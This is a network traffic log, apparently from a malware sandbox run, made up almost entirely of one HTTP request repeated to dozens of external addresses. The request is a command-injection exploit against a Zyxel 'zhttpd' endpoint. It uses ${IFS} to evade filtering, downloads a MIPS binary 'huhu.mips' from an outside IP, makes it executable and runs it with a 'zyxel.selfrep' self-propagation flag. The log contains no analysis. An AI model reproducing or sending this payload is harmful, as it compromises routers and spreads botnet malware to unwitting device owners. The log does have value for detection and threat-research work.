                                                      Feb 2, 2024 06:36:04.889808893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7328192.168.2.1455422132.19.165.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889836073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7329192.168.2.144081042.155.97.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889899015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7330192.168.2.1456508107.44.146.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889931917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7331192.168.2.1441092218.91.45.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889971018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7332192.168.2.1456396106.15.88.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.889995098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7333192.168.2.1456350191.13.20.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890023947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7334192.168.2.144485637.27.126.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890077114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7335192.168.2.1443984201.208.66.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890124083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7336192.168.2.1439430157.39.5.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890172958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7337192.168.2.144745485.249.55.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890189886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7338192.168.2.143405265.7.187.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890224934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7339192.168.2.1446740177.170.62.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890254974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7340192.168.2.1448450104.157.35.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890312910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7341192.168.2.143917099.109.124.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890363932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7342192.168.2.1437642209.120.75.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890398026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7343192.168.2.1452120194.169.97.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890438080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7344192.168.2.1456286206.74.12.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890464067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7345192.168.2.1459780184.69.253.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890515089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7346192.168.2.1442178154.120.99.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890559912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7347192.168.2.1444126222.111.170.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890597105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7348192.168.2.1436802131.207.59.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890642881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7349192.168.2.1437006103.158.136.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890662909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7350192.168.2.1456728107.129.146.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890708923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7351192.168.2.145368644.174.183.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890741110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7352192.168.2.144294813.33.24.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890790939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7353192.168.2.143381053.243.142.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890830040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7354192.168.2.143358251.231.46.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890896082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7355192.168.2.1450830168.20.91.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890933037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7356192.168.2.1450216174.167.65.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.890988111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7357192.168.2.1434416123.43.133.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891016006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7358192.168.2.1440428146.100.123.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891061068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7359192.168.2.144640466.180.42.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891091108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7360192.168.2.1441062203.113.239.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891129017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7361192.168.2.1433284117.164.48.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891169071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7362192.168.2.1458352189.71.0.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891212940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7363192.168.2.1440938109.176.104.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891258001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7364192.168.2.144243298.92.89.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891300917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7365192.168.2.143743288.121.72.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891338110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7366192.168.2.1454310217.111.90.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891395092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7367192.168.2.145540847.220.76.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891448021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7368192.168.2.144247660.101.67.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891470909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7369192.168.2.144656493.177.124.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891516924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7370192.168.2.143521896.56.24.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891542912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7371192.168.2.1449260128.11.223.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891585112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7372192.168.2.1458680104.116.71.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891634941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7373192.168.2.1434626115.78.97.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891655922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7374192.168.2.145739690.47.2.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891706944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7375192.168.2.1452522173.245.145.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891737938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7376192.168.2.1440846170.250.48.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891788006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7377192.168.2.144172258.138.128.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891844034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7378192.168.2.1437916102.167.121.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891861916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7379192.168.2.1455934200.252.140.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891891956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7380192.168.2.145825293.53.133.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891927004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7381192.168.2.1452622194.215.178.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.891979933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7382192.168.2.1450094124.66.119.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892024994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7383192.168.2.143906296.123.53.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892056942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7384192.168.2.14582609.32.167.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892118931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7385192.168.2.1441220142.58.224.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892143011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7386192.168.2.145223017.49.105.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892180920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7387192.168.2.144816472.127.99.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892231941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7388192.168.2.1436292102.185.242.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892278910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7389192.168.2.145858619.45.129.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:04.892307997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7390192.168.2.1435636102.211.15.9443
                                                      TimestampBytes transferredDirectionData
